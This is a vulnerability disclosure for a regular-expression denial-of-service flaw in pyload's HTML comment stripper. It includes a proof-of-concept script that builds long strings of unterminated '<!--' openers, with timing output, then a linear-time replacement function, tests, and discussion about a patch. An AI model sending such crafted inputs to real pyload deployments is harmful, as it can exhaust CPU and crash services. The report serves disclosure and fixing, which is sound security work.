Inefficient Regular Expression Complexity in pyload/pyload
Reported on Sep 20th 2021
✍️ Description
The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker who is able to supply crafted HTML comments as input to the comments function of utils/web/purge.py may cause an application to consume an excessive amount of CPU.
The pinned lines linked below contain the vulnerable regex.
🕵️♂️ Proof of Concept
Reproducer where we’ve copied the relevant code:
https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7
https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14
Put the code below in a poc.py file and run it with python:
import re
import time

# Regex copied from pyload's utils/web/purge.py: a lazy ".*?" under re.S
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string."""
    return _RE_COMMENTS.sub("", value).strip()


# Each iteration feeds a longer run of unterminated "<!--" openers; the
# engine rescans to the end of the string from every opener before failing.
for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = "" + "<!--" * (i * 10000) + "-"
    comments(payload)
    stop_time = time.perf_counter() - start_time  # seconds, despite the "ms" label below
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")
Check the Output:
Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms
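As an added illustration (not code from this report or from the pyload project), the following places the report's regex beside a hypothetical linear-time replacement, comments_linear, which locates each comment with two str.find calls instead of a backtracking pattern and stops as soon as it meets an opener with no closer after it. The names comments_linear, same_output and elapsed are assumptions for this example, and the sample inputs are constructed here.

```python
import re
import time

# The pattern from the report: for every unterminated "<!--", the lazy ".*?"
# rescans to the end of the input before that match attempt fails, so a run
# of n openers costs O(n^2).
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string (the report's function)."""
    return _RE_COMMENTS.sub("", value).strip()


def comments_linear(value):
    """Hypothetical replacement (not pyload's fix): strip <!-- ... --> using
    str.find, so each character is visited a bounded number of times.

    Semantics match the regex: a comment ends at the first "-->" after its
    opener, and an unterminated "<!--" is left in place untouched.
    """
    out = []
    pos = 0
    while True:
        start = value.find("<!--", pos)
        if start == -1:
            out.append(value[pos:])
            break
        out.append(value[pos:start])
        end = value.find("-->", start + 4)
        if end == -1:
            # No closer anywhere later, so no later opener can match either:
            # keep the remainder verbatim and stop, instead of rescanning.
            out.append(value[start:])
            break
        pos = end + 3
    return "".join(out).strip()


def same_output(value):
    """True when the regex and the linear scanner agree on the input."""
    return comments(value) == comments_linear(value)


def elapsed(func, value):
    """Wall-clock seconds for one call of func(value)."""
    start = time.perf_counter()
    func(value)
    return time.perf_counter() - start


# Constructed inputs: ordinary markup plus the report's pathological shape.
SAMPLES = [
    "plain text",
    "a<!-- one -->b<!-- two -->c",
    "<!--<!---->tail",
    "<!-- multi\nline -->\n  kept  ",
    "unterminated <!-- comment",
    "<!--" * 2000 + "-",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        assert same_output(sample), repr(sample[:40])
    # 40001 characters: a few seconds for the regex, milliseconds for the scanner.
    pathological = "<!--" * 10000 + "-"
    print("regex:  %.3f s" % elapsed(comments, pathological))
    print("linear: %.3f s" % elapsed(comments_linear, pathological))
```

The equivalence loop over SAMPLES is the check worth keeping when swapping a regex for a hand-written scanner: the timing difference is only useful if the two functions return the same text on terminated, nested-looking, multi-line and unterminated comments.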
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Hello, I got your email. How do you suggest fixing this issue?
@maintainer Submitted a patch. Please validate this issue using Mark as valid, and also please confirm the fix once it gets merged. You can select my branch fix-redos.
@admin Can you please guide the maintainer?
@maintainer - please click the confirm fix button above, and follow the steps in the modal form. When selecting who fixed the vulnerability, feel free to elect @ready-research.